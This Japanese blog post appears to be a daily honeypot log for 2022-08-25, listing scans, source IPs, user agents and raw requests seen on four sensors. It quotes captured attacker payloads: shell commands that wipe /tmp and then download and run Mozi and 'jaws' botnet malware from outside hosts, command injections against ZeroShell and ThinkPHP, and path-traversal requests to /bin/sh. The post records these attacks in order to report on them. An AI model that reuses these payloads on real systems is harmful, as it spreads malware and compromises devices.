2022/08/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/08/25分です。

特徴

共通

/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：168 (前日比：85)
US：総アクセス数：104 (前日比：58)
UK：総アクセス数：92 (前日比：51)
SG：総アクセス数：71 (前日比：19)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
98	3.21.154.90	United States
2	3.81.221.61	United States
1	20.27.184.147	United States
1	20.27.185.235	United States
1	20.200.51.93	United States
1	20.213.60.141	United States
1	20.213.249.103	United States
1	20.214.90.177	United States
1	37.46.134.25	Russia
1	38.242.232.9	United States
3	94.156.175.57	Bulgaria
15	95.214.235.205	Ukraine
1	107.150.105.215	United States
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
7	118.123.105.87	China
1	118.193.58.104	Hong Kong
8	135.125.244.48	France
8	135.125.246.110	France
1	151.106.40.96	Germany
1	178.72.70.126	Russia
1	180.149.125.166	Mongolia
1	180.149.125.173	Mongolia
2	185.100.87.136	Seychelles
1	192.81.131.253	United States
1	192.241.219.110	United States
1	198.235.24.26	United States
1	198.235.24.140	United States

UserAgent一覧

件数	UserAgent
19	`-`
1	`Go-http-client/1.1`
5	`Hello, world`
1	`IDBTE4M CODE87`
1	`Mozila/5.0`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Linux; Android 11; RMX1921) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
35	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0`
11	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`msnbot/0.11 ( http[:]//search[.]msn[.]com/msnbot.htm)`
87	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
3		`\x16\x03\x01\x01D\x01`
12		`\x16\x03\x01`
37	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`//.aws/credentials`	HTTP/1.1
1	GET	`//.env.bak`	HTTP/1.1
1	GET	`//.git/config`	HTTP/1.1
1	GET	`//_profiler/phpinfo`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`//admin/dashboard/info.php`	HTTP/1.1
1	GET	`//admin/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//admin/dashboard/phpinfo`	HTTP/1.1
1	GET	`//admin/info.php`	HTTP/1.1
1	GET	`//admin/infophp.php`	HTTP/1.1
1	GET	`//admin/phpinfo.php`	HTTP/1.1
1	GET	`//admin/phpinfo`	HTTP/1.1
1	GET	`//administrator/info.php`	HTTP/1.1
1	GET	`//administrator/phpinfo.php`	HTTP/1.1
1	GET	`//apache[.]php`	HTTP/1.1
1	GET	`//aws[.]yml`	HTTP/1.1
1	GET	`//config[.]js`	HTTP/1.1
1	GET	`//console/info.php`	HTTP/1.1
1	GET	`//console/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/admin/info.php`	HTTP/1.1
1	GET	`//dashboard/admin/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/admin/phpinfo`	HTTP/1.1
1	GET	`//dashboard/info.php`	HTTP/1.1
1	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//dashboard/phpinfo`	HTTP/1.1
1	GET	`//dashboard/test.php`	HTTP/1.1
1	GET	`//debug/default/view?panel=config`	HTTP/1.1
1	GET	`//deploy[.]php`	HTTP/1.1
1	GET	`//dev[.]php`	HTTP/1.1
1	GET	`//env/phpinfo`	HTTP/1.1
1	GET	`//foo[.]php`	HTTP/1.1
1	GET	`//forum/info.php`	HTTP/1.1
1	GET	`//forum/phpinfo.php`	HTTP/1.1
1	GET	`//frontend_dev[.]php/$`	HTTP/1.1
1	GET	`//i[.]php`	HTTP/1.1
1	GET	`//in[.]php`	HTTP/1.1
1	GET	`//index1[.]php`	HTTP/1.1
1	GET	`//index[.]php`	HTTP/1.1
1	GET	`//inf[.]php`	HTTP/1.1
1	GET	`//info1[.]php`	HTTP/1.1
1	GET	`//info2[.]php`	HTTP/1.1
1	GET	`//info3[.]php`	HTTP/1.1
1	GET	`//info4[.]php`	HTTP/1.1
2	GET	`//info[.]php`	HTTP/1.1
1	GET	`//infophp/index.php`	HTTP/1.1
1	GET	`//infophp/testphp.php`	HTTP/1.1
1	GET	`//infophp[.]php`	HTTP/1.1
1	GET	`//information[.]php`	HTTP/1.1
1	GET	`//information`	HTTP/1.1
1	GET	`//infos[.]php`	HTTP/1.1
1	GET	`//ini[.]php`	HTTP/1.1
1	GET	`//o[.]php`	HTTP/1.1
1	GET	`//old_phpinfo[.]php`	HTTP/1.1
1	GET	`//p[.]php`	HTTP/1.1
1	GET	`//php-info.php`	HTTP/1.1
1	GET	`//php-info`	HTTP/1.1
1	GET	`//php/phpinfo.php`	HTTP/1.1
1	GET	`//php1[.]php`	HTTP/1.1
1	GET	`//php[.]php`	HTTP/1.1
1	GET	`//php_details`	HTTP/1.1
1	GET	`//php_info[.]php`	HTTP/1.1
1	GET	`//phpdetails`	HTTP/1.1
2	GET	`//phpinfo/info.php`	HTTP/1.1
1	GET	`//phpinfo/php-details.php`	HTTP/1.1
2	GET	`//phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`//phpinfo/phpinfo`	HTTP/1.1
1	GET	`//phpinfo1[.]php`	HTTP/1.1
1	GET	`//phpinfo2[.]php`	HTTP/1.1
1	GET	`//phpinfo3[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]html`	HTTP/1.1
2	GET	`//phpinfo[.]php`	HTTP/1.1
1	GET	`//phpinfo[.]txt`	HTTP/1.1
1	GET	`//phpinfo`	HTTP/1.1
1	GET	`//phpinformation`	HTTP/1.1
1	GET	`//phpinfos[.]php`	HTTP/1.1
1	GET	`//phptest[.]php`	HTTP/1.1
1	GET	`//phpversion[.]php`	HTTP/1.1
1	GET	`//pinfo[.]php`	HTTP/1.1
1	GET	`//rest[.]php`	HTTP/1.1
1	GET	`//root/info.php`	HTTP/1.1
1	GET	`//root/infophp`	HTTP/1.1
1	GET	`//root/phpinfo.php`	HTTP/1.1
1	GET	`//scripts/index.php`	HTTP/1.1
1	GET	`//scripts/info.php`	HTTP/1.1
1	GET	`//scripts/phpinfo.php`	HTTP/1.1
1	GET	`//scripts/phpinfo`	HTTP/1.1
1	GET	`//test1[.]php`	HTTP/1.1
1	GET	`//test1`	HTTP/1.1
1	GET	`//test2[.]php`	HTTP/1.1
1	GET	`//test3[.]php`	HTTP/1.1
1	GET	`//test4[.]php`	HTTP/1.1
1	GET	`//test[.]php`	HTTP/1.1
1	GET	`//testphp[.]php`	HTTP/1.1
1	GET	`//token[.]php`	HTTP/1.1
1	GET	`/assets/img/logo.png`	HTTP/1.1
1	GET	`/c/`	HTTP/1.1
4	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
14	4.71.37.46	United States
1	20.24.248.24	United States
1	20.84.53.67	United States
1	20.87.73.92	United States
1	20.96.230.74	United States
1	20.104.134.212	United States
1	20.206.173.36	United States
1	20.214.79.164	United States
1	20.214.114.165	United States
1	20.219.237.38	United States
1	20.248.129.58	United States
1	20.250.30.178	United States
1	20.250.85.84	United States
1	20.251.64.167	United States
1	34.221.186.173	United States
2	45.227.254.8	Belize
8	51.79.29.48	Canada
1	52.139.23.173	United States
2	52.253.119.158	United States
1	58.242.60.118	China
1	61.3.186.154	India
1	64.62.197.40	United States
2	80.66.88.211	Russia
1	91.191.209.202	Bulgaria
2	92.255.85.183	Hong Kong
1	109.206.241.219	Bulgaria
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
8	128.199.128.178	United Kingdom
1	152.32.149.247	Hong Kong
1	152.32.150.177	Hong Kong
1	156.216.222.164	Egypt
3	159.203.34.249	United States
1	162.142.125.213	United States
1	167.94.146.58	United States
1	167.99.62.205	United States
2	179.43.154.206	Panama
1	180.149.125.168	Mongolia
1	180.149.125.173	Mongolia
10	185.7.214.117	Hong Kong
8	185.254.196.223	Ukraine
1	192.241.235.211	United States
3	193.37.69.208	Russia
1	198.235.24.17	United States
1	208.67.105.203	United States
1	212.71.238.60	United States
1	212.112.100.46	Kyrgyzstan

UserAgent一覧

件数	UserAgent
40	`-`
1	`Go-http-client/1.1`
12	`Hello, world`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
2	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
21	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`curl/7.68.0`
1	`python-requests/2.27.1`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
10		`\x03`
3		`\x16\x03\x01\x01D\x01`
7		`\x16\x03\x01`
1		`\x82\xd2\x86\x8f\t\xaaW\x84M\x06\x98@\x1e\xcf\xcf\xd4N/\xb6\x90n\v\xf4\x90\xd4\x875;b\v\xf4\x90o\x0f\xb6\x90n\v\xf7\x98n\v\xf4\x90n\v\xf4\x90\xc4\v\xf4\x90n\v\xdf\xbbn\v\xf4\x90F\v\xf4\x90n\v\xf4\x90n\v\xf4\x90n\v\xf4\x90o\n`
23	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rdc960ak`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/c/`	HTTP/1.1
14	GET	`/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5[.]206[.]227[.]228%2Fzero;sh%20zero;%22`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
11	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web/config.js`	HTTP/1.0
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	13.95.140.33	United States
1	20.23.69.94	United States
1	20.238.251.103	United States
2	45.227.254.49	Belize
2	45.227.254.51	Belize
1	52.90.130.203	United States
1	74.119.193.190	Moldova
1	77.83.36.23	Ukraine
2	80.87.206.250	Russia
1	91.191.209.202	Bulgaria
3	94.156.175.57	Bulgaria
3	106.75.15.80	China
1	109.206.241.219	Bulgaria
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	161.97.74.103	Germany
1	167.71.84.55	United States
37	178.79.148.229	United States
3	180.76.119.120	China
1	180.149.125.166	Mongolia
1	180.149.125.169	Mongolia
10	185.7.214.117	Hong Kong
8	185.254.196.223	Ukraine
1	192.241.219.227	United States
1	198.235.24.154	United States
1	205.210.31.18	United States
1	209.141.34.187	United States

UserAgent一覧

件数	UserAgent
21	`-`
1	`1`
2	`Hello, world`
1	`Java/1.8.0_341`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
11	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1`
34	`curl/7.54.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`SSH-2.0-libssh2_1.9.0`
5		`\x03`
3		`\x16\x03\x01\x01D\x01`
3		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	CONNECT	`www[.]dazn[.]com:443`	HTTP/1.1
12	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/admin.cfm`	HTTP/1.1
1	GET	`/base.jsa`	HTTP/1.1
1	GET	`/c/`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/default.jsa`	HTTP/1.1
1	GET	`/default.php`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/home.jsa`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cfm`	HTTP/1.1
1	GET	`/index.jhtml`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/indice.html`	HTTP/1.1
1	GET	`/localstart.shtml`	HTTP/1.1
1	GET	`/main.html`	HTTP/1.1
1	GET	`/nmaplowercheck1661322531`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/start.aspx`	HTTP/1.1
1	GET	`/start.html`	HTTP/1.1
1	GET	`/start.jsa`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/tOg2`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/wp-comments-post.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.80	Romania
1	2.57.122.209	Romania
1	3.81.221.61	United States
1	20.74.117.226	United States
1	20.84.53.67	United States
1	27.0.175.252	Spain
2	38.242.232.9	United States
1	45.33.108.103	United States
11	51.79.29.48	Canada
1	52.142.185.254	United States
1	59.99.139.54	India
1	66.240.192.82	United States
1	74.82.47.6	United States
1	109.206.241.219	Bulgaria
2	109.237.103.123	Russia
1	128.199.60.239	United Kingdom
2	138.197.183.239	United States
10	161.35.86.181	United States
1	161.35.188.242	United States
1	162.142.125.222	United States
1	167.94.145.59	United States
1	167.99.62.205	United States
1	180.149.125.162	Mongolia
1	180.149.125.168	Mongolia
10	185.7.214.117	Hong Kong
1	185.220.101.191	Germany
8	185.254.196.223	Ukraine
1	192.241.206.84	United States
2	194.165.16.76	Panama
1	198.235.24.2	United States
1	212.23.222.167	Poland
1	217.118.182.110	Russia

UserAgent一覧

件数	UserAgent
13	`-`
4	`Go-http-client/1.1`
3	`Hello, world`
1	`Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
5	`l9explore/1.3.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
6		`\x16\x03\x01`
1	CONNECT	`leakix[.]net:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/c/`	HTTP/1.1
1	GET	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/idx_config/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0
1	PUT	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1